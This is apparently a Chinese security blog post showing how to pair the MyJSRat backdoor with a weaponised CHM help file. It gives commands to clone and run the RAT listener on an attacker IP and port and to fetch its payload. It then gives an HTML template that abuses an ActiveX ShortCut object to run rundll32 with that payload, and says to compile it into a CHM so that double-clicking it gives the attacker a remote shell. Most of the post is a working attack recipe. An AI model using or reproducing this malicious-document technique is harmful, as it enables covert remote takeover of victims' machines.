MyJSRat结合CHM命令执行


MyJSRat结合CHM命令执行

MyJSRat

MyJSRat 是JSBackdoor的python版本

下载地址:https://github.com/Ridter/MyJSRat

Easy CHM

CHM是英语“Compiled Help Manual”的简写,即“已编译的帮助文件”。CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。

步骤

下载MyJSRat并运行

git clone https://github.com/Ridter/MyJSRat
python MyJSRat.py -i IPaddr -p port

下载wtf文件

浏览器访问https://IPaddr:port/wtf,并保存至txt文件中

将上面保存的代码写入到如下代码的Item1的Value值中

:要在rundll32.exe前后添加,

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

保存为HTML文件

新建目录,将上述代码保存在新建文件夹中

通过EasyCHM制作CHM文件

通过EasyCHM编译exp.html文件

双击上线

此时只要双击test.CHM文件,即可上线


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
CVE-2019-14361 & CVE-2019-14379漏洞复现 CVE-2019-14361 & CVE-2019-14379漏洞复现
CVE-2019-14361 & CVE-2019-14379漏洞复现7月30日晚收到了推送,得知 Jackson-databind 又出了新的 RCE ,又有大佬找到了新的利用方式。 漏洞分析根据 Jackson 开发者的 iss
2019-08-01
下一篇 
工控安全渗透 工控安全渗透
工控安全渗透工业控制系统的结构和场景工业控制系统场景——啤酒厂 啤酒工厂布局 监控总控室 生产线设备 工业控制系统结构 传感器和执行器 可编程控制器(PLC) 工业网络及现场总线 工业计算机及工业组态软件 工业控制系统应用场景
2019-07-28
  目录